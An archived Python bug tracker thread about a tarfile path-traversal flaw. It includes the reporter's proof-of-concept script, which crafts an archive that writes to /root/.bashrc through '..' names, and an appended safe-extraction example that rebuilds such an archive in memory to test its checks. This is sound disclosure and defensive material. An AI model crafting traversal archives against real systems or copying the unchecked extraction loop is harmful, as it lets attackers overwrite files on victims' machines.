[issue45170] tarfile missing cross-directory checking

2021-09-20 Thread Martin Panter


Martin Panter  added the comment:

Issue 21109 has been open for a while and is the same as this, if I am not mistaken.

--
nosy: +martin.panter
resolution:  -> duplicate
stage:  -> resolved
status: open -> closed
superseder:  -> tarfile: Traversal attack vulnerability

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue45170] tarfile missing cross-directory checking

2021-09-11 Thread Eric V. Smith


Eric V. Smith  added the comment:

This is documented in the tarfile docs:

Warning

Never extract archives from untrusted sources without prior inspection. It is 
possible that files are created outside of path, e.g. members that have 
absolute filenames starting with "/" or filenames with two dots "..".

--
nosy: +eric.smith




[issue45170] tarfile missing cross-directory checking

2021-09-11 Thread daji ma


New submission from daji ma :

tarfile is missing cross-directory checking, like ../ or ..\; this potentially 
causes cross-directory decompression.
The exploit:
# -*- coding: utf-8 -*-
import tarfile


def extract_tar(file_path, dest_path):
    # Extracts every member into dest_path without checking the member name.
    try:
        with tarfile.open(file_path, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(info.name, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False


def make_tar():
    # Stores the local file 'bashrc' under an arcname made of '..' segments;
    # tarfile strips the leading '/' but keeps the '..' components.
    tar_file = tarfile.open('x.tar.gz', 'w:gz')
    tar_file.add('bashrc', '/../../../../root/.bashrc')
    tar_file.list(verbose=True)
    tar_file.close()


if __name__ == '__main__':
    make_tar()
    # Extracting into 'xx' writes to xx/../../../../root/.bashrc
    extract_tar('x.tar.gz', 'xx')

--
components: Library (Lib)
messages: 401631
nosy: xiongpanju
priority: normal
severity: normal
status: open
title: tarfile missing cross-directory checking
type: security
versions: Python 3.8

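The "prior inspection" the tarfile docs quoted by Eric V. Smith call for, applied to an archive shaped like the one in daji ma's report, as an added example that is not code from this thread or from CPython's tarfile module. The function names (unsafe_members, safe_extract, build_archive, demo) are this example's own, and the archive contents are constructed in memory so that nothing outside a temporary directory is ever written. Beyond the ".." case in the report it also rejects absolute names, symlink and hard link members whose targets leave the destination, and device nodes.

```python
import io
import os
import tarfile
import tempfile


def _is_within(base, target):
    # Both paths are normalised with abspath so ".." segments are collapsed
    # before the containment test; symlinks already on disk are not followed.
    base = os.path.abspath(base)
    target = os.path.abspath(target)
    return os.path.commonpath([base, target]) == base


def unsafe_members(tar, dest):
    """Inspect every member before anything is written and return
    (member, reason) pairs for entries that would land outside dest."""
    bad = []
    for m in tar.getmembers():
        target = os.path.join(dest, m.name)
        if os.path.isabs(m.name) or not _is_within(dest, target):
            bad.append((m, "name escapes destination"))
            continue
        if m.issym():
            # A symlink target is resolved relative to the link's own directory.
            link_target = os.path.join(os.path.dirname(target), m.linkname)
            if os.path.isabs(m.linkname) or not _is_within(dest, link_target):
                bad.append((m, "symlink target escapes destination"))
        elif m.islnk():
            # A hard link target is relative to the archive root.
            if not _is_within(dest, os.path.join(dest, m.linkname)):
                bad.append((m, "hardlink target escapes destination"))
        elif m.isdev():
            bad.append((m, "device node"))
    return bad


def safe_extract(tar, dest):
    """Refuse the whole archive if any member fails inspection; otherwise extract."""
    bad = unsafe_members(tar, dest)
    if bad:
        names = ", ".join(f"{m.name} ({why})" for m, why in bad)
        raise tarfile.TarError("refusing to extract: " + names)
    tar.extractall(dest)


def build_archive(malicious):
    """Constructed in-memory archives for the demo (hypothetical content).
    The malicious one carries the traversal name from the report plus a
    symlink to /etc; both hold one harmless regular file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        if malicious:
            data = b"echo pwned\n"
            # addfile() writes the TarInfo name verbatim, so the ".." survives.
            info = tarfile.TarInfo("../../../../root/.bashrc")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
            link = tarfile.TarInfo("etc")
            link.type = tarfile.SYMTYPE
            link.linkname = "/etc"
            tar.addfile(link)
        data = b"hello\n"
        info = tarfile.TarInfo("readme.txt")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def demo():
    """Run both archives through safe_extract into a fresh temp dir and
    report what happened."""
    result = {}
    with tempfile.TemporaryDirectory() as dest:
        with tarfile.open(fileobj=build_archive(True), mode="r:gz") as tar:
            result["flagged"] = [m.name for m, _ in unsafe_members(tar, dest)]
            try:
                safe_extract(tar, dest)
                result["malicious_refused"] = False
            except tarfile.TarError:
                result["malicious_refused"] = True
        with tarfile.open(fileobj=build_archive(False), mode="r:gz") as tar:
            safe_extract(tar, dest)
        result["clean_extracted"] = os.path.isfile(os.path.join(dest, "readme.txt"))
        result["nothing_else_written"] = sorted(os.listdir(dest)) == ["readme.txt"]
    return result


if __name__ == "__main__":
    print(demo())
```

Two caveats a reviewer would want stated: the check looks only at the names inside the archive, so it assumes extraction into a fresh, empty directory (a symlink that already exists under dest is not detected), and it is all-or-nothing on purpose, since skipping just the bad members still lets an attacker choose what gets written. Python 3.12 added a `filter` argument to `extract()`/`extractall()` (PEP 706, also backported to the 3.8 through 3.11 maintenance releases); `filter="data"` performs equivalent checks inside tarfile itself, and is the better choice where it is available.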